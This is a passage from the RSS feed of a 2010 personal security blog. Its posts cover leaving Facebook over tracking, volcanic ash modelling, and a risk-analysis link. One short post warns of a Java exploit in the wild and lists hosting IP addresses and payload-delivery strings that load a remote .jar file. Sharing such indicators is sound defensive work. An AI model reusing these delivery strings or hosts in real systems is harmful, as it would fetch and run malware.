		<guid isPermaLink="false">http://www.cyberwart.com/blog/?p=524</guid>
		<description><![CDATA[I like facebook. I was a student when Facebook was first developed. &#8220;Back in the day&#8221; many universities, including mine, gave freshmen a &#8220;face book&#8221;. Basically it was a picture book with all the incoming freshmen and their names. It was a mechanism to help you meet people. Facebook.com was the very savvy digital evolution of that concept. As [...]]]></description>
			<content:encoded><![CDATA[<p>I like facebook. I was a student when Facebook was first developed. &#8220;Back in the day&#8221; many universities, including mine, gave freshmen a &#8220;face book&#8221;. Basically it was a picture book with all the incoming freshmen and their names. It was a mechanism to help you meet people. Facebook.com was the very savvy digital evolution of that concept. As a geek the useful digital evolution of paper product was very cool to me. Since then it has greatly expanded and evolved to fit a different purpose. One of it&#8217;s best utilities is catching up with old friends. I&#8217;ll greatly miss this use. Unfortunately, big business has mutated a lovely utility into a shameful invasion of privacy.</p>
<p>I was just surfing CNN and noticed I was logged into CNN via facebook. I was logged into facebook, but I can&#8217;t recall ever giving CNN the okay to access my facebook information. Additionally, there&#8217;s a Visual Studio 2010 ad &#8211; which I&#8217;m guessing is targeted. This implies that facebook is tracking the sites I visit and collaborating/conspiring with marketers to track my internet usage to better market products and make money. Alas, this is just too far for me. I&#8217;m going to say goodbye to facebook in the near future and would advise others to do the same.</p>
<p style="text-align: center;"><a rel="attachment wp-att-526" href="http://www.cyberwart.com/blog/2010/05/03/good-bye-facebook/5-3-2010-12-36-14-am-2/"><img class="aligncenter" title="5-3-2010 12-36-14 AM" src="http://www.cyberwart.com/blog/wp-content/uploads/2010/05/5-3-2010-12-36-14-AM1.png" alt="" width="613" height="565" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.cyberwart.com/blog/2010/05/03/good-bye-facebook/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>JDT Exploit</title>
		<link>http://www.cyberwart.com/blog/2010/04/26/jdt-exploit/</link>
		<comments>http://www.cyberwart.com/blog/2010/04/26/jdt-exploit/#comments</comments>
		<pubDate>Tue, 27 Apr 2010 01:38:28 +0000</pubDate>
		<dc:creator>mjw</dc:creator>
				<category><![CDATA[]]></category>

		<guid isPermaLink="false">http://www.cyberwart.com/blog/?p=521</guid>
		<description><![CDATA[We&#8217;re seeing the Java exploit used in the wild. It&#8217;s being hosted at: 92.52.88.240, 94.23.110.101, and 93.89.80.117 with the payload being delivered http: -J-jar -J\\\\85.9.22.19\\public\\0923.jar and http: -J-jar -J\\\\174.37.45.153\\public\\0923.jar Sorry no time for a proper write up.]]></description>
			<content:encoded><![CDATA[<p>We&#8217;re seeing the Java exploit used in the wild. It&#8217;s being hosted at: 92.52.88.240, 94.23.110.101, and 93.89.80.117 with the payload being delivered http: -J-jar -J\\\\85.9.22.19\\public\\0923.jar and http: -J-jar -J\\\\174.37.45.153\\public\\0923.jar</p>
<p>Sorry no time for a proper write up.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cyberwart.com/blog/2010/04/26/jdt-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>You Have to Model</title>
		<link>http://www.cyberwart.com/blog/2010/04/18/you-have-to-model/</link>
		<comments>http://www.cyberwart.com/blog/2010/04/18/you-have-to-model/#comments</comments>
		<pubDate>Sun, 18 Apr 2010 18:52:12 +0000</pubDate>
		<dc:creator>mjw</dc:creator>
				<category><![CDATA[]]></category>

		<guid isPermaLink="false">http://www.cyberwart.com/blog/?p=514</guid>
		<description><![CDATA[Richard Bejtlich posted an analysis of the current flight problems in Europe caused by the volcanic eruption. The article he cites is here.  In the post, Richard rather broadly dismisses models in favor of &#8220;measurement&#8221;. I was a bit struck by this &#8211; especially given my focus as an undergrad on mathematical modeling. You can&#8217;t [...]]]></description>
			<content:encoded><![CDATA[<p>Richard Bejtlich <a href="http://taosecurity.blogspot.com/2010/04/measurement-over-models.html">posted an analysis</a> of the current flight problems in Europe caused by the volcanic eruption. The article he cites is <a href="http://www.reuters.com/article/idUSTRE63E1TM20100418">here</a>.  In the post, Richard rather broadly dismisses models in favor of &#8220;measurement&#8221;. I was a bit struck by this &#8211; especially given my focus as an undergrad on mathematical modeling.</p>
<p>You can&#8217;t understand the flight problem without a model. Yes you need data, but every <a href="http://en.wikipedia.org/wiki/Mathematical_model">mathematical model </a>uses data. The purpose of this type of model is to estimate how an event affects the system &#8211; doing so in a mathematical valid manner that can be tested and the model itself evaluated with existing data. Therefore, I&#8217;d argue there&#8217;s no innate problem between a model and measurement/data. Models are heavy data consumers. They ingest the data attempt to correlate it together and then extrapolate future conditions. The easiest way for someone unfamiliar with modeling is to think back to the hurricane season. Based on a tremendous amount of data, models are used to predict the likely path of hurricanes, their predicted winds, their speed, and amount of flooding. The models are far from perfect, but generally they&#8217;re pretty good &#8211; and the best we can do.</p>
<div id="_mcePaste">For the particular problem of the volcanic ash affecting flights, lets consider our data:</div>
<div id="_mcePaste">
<ul>
<li> Lufthansa flew 10 Beoing 737s between Munich and Frankfurt at particular points in time and experienced no perceivable problems</li>
<li> Finnish Hornets flew through the cloud and had severe engine damage.</li>
<li> Historically planes have experienced numerous problems flying through ash clouds.</li>
</ul>
</div>
<div id="_mcePaste">That&#8217;s all great, but it doesn&#8217;t answer the question people really want to know. Data is historical, but what we want is to predict what will happen in the future.  The real question is what is the  probability of an engine failure caused by the cloud while flying between points A and B at a particular time. You have to model the conditions to begin to answer that. Even if you&#8217;re flying from A to B+delta, the time and air craft are likely different. Thus you have to model the slightly different location, the effect on the different craft, and any variations from the volcano in ash flow and particle properties. Data alone will only tell you if a particular flight flew safely, but that&#8217;s little good if you&#8217;re a regulator trying to determine if it&#8217;s safe to fly before the flight has occurred.</div>
<p></p>
<div>Also to note the<a href="http://metoffice.com/aviation/vaac/london.html"> London VAAC</a> closed UK airspace. There are numerous VAACs which make recommendations to the respective leadership in their countries.</div>
<p></p>
<div>How does this relate to computer security, only tangentially. I think the common thread is how decisions are made. It&#8217;s hard to find someone more data oriented than me, but once you have data it must be processed to tell you something about the future. That processing is a model. If it&#8217;s an analyst with a methodology or a math geek with a simulation its some type of model. Therefore, it&#8217;s important to understand that you are modeling and how to do it well.</div>
]]></content:encoded>
			<wfw:commentRss>http://www.cyberwart.com/blog/2010/04/18/you-have-to-model/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Wonderful Article &#8211; Crunching the Risk Analysis Numbers</title>
		<link>http://www.cyberwart.com/blog/2010/04/15/wonderful-article-crunching-the-risk-analysis-numbers/</link>
		<comments>http://www.cyberwart.com/blog/2010/04/15/wonderful-article-crunching-the-risk-analysis-numbers/#comments</comments>
		<pubDate>Thu, 15 Apr 2010 17:02:08 +0000</pubDate>
		<dc:creator>mjw</dc:creator>
				<category><![CDATA[]]></category>

		<guid isPermaLink="false">http://www.cyberwart.com/blog/?p=510</guid>
		<description><![CDATA[http://www.foreignaffairs.com/articles/66186/john-mueller-and-mark-g-stewart/hardly-existential?page=show]]></description>
			<content:encoded><![CDATA[<p>http://www.foreignaffairs.com/articles/66186/john-mueller-and-mark-g-stewart/hardly-existential?page=show</p>
<p><a rel="attachment wp-att-511" href="http://www.cyberwart.com/blog/2010/04/15/wonderful-article-crunching-the-risk-analysis-numbers/mueller-comparison-of-annual-fatality/"><img class="aligncenter size-full wp-image-511" title="Mueller-comparison-of-annual-fatality" src="http://www.cyberwart.com/blog/wp-content/uploads/2010/04/Mueller-comparison-of-annual-fatality.jpg" alt="" width="552" height="567" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.cyberwart.com/blog/2010/04/15/wonderful-article-crunching-the-risk-analysis-numbers/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
